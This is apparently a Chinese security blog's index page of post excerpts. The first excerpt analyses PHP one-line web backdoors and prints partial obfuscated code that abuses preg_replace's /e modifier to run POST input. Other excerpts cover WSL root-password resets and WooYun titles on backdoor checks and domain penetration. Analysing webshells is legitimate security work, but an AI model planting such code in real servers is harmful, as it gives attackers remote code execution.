渗透教程

php一句话后门的几种变形分析[preg_replace函数]

今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…继续阅读 »
网络运维

Connectify Dispatch指定程序使用指定网卡[运维神器]

很多时候,在进行内网维护的时候我们同时需要使用外网,但是当外网与内网同时使用的时候,除非程序已经建立稳定连接,否则新的网络连接肯定会不如愿,比如当你ping一个ip的时候到底走的哪个网卡呢? 这时候就需要一个软件来分配网卡,而这个工具我几年前在学校的时候经常用,却没想到现在…继续阅读 »
网络运维

win10子系统ubuntu linux暴力修改root用户密码

今天体验了把win10子系统的ubuntu系统,感觉还不错,安装与使用教程就不用多提了,网上有一大把总体比较简单。 但是就在让我初始化用户的时候我手贱输了一个非root用户,导致没法切换root用户,百度了下网上也没有相关的讨论。   索性直接来硬的喽, 修改shadow文件 既然linux是windows的…继续阅读 »
乌云zone

关于菜刀后门排查

关于菜刀后门排查 小杰哥 (能学则学,技多不压身。) | 2016-03-08 14:56 …继续阅读 »
乌云zone

关于超市里的存包箱

关于超市里的存包箱 blue | 2012-07-09 21:26 周末去超…继续阅读 »
乌云zone

关于利用webrtc获取内网其他主机站点信息(favico.ico)的一些思路

关于利用webrtc获取内网其他主机站点信息(favico.ico)的一些思路 Black_Hole (暂无) | 2016-03-26 03:26 …继续阅读 »
乌云zone

关于漏洞处理机制的改进讨论

关于漏洞处理机制的改进讨论 xsser | 2013-01-24 11:33 …继续阅读 »
乌云zone

关于乌云最近的一些小小的尝试

关于乌云最近的一些小小的尝试 xsser | 2016-01-29 21:15 …继续阅读 »
乌云zone

关于用php写exp的一点问题

关于用php写exp的一点问题 lxsec (我的头像灰了!) | 2013-03-22 22:04 …继续阅读 »
乌云zone

关于域渗透的一些TIPS(持续更新)

关于域渗透的一些TIPS(持续更新) 猪猪侠 | 2015-10-15 13:28 …继续阅读 »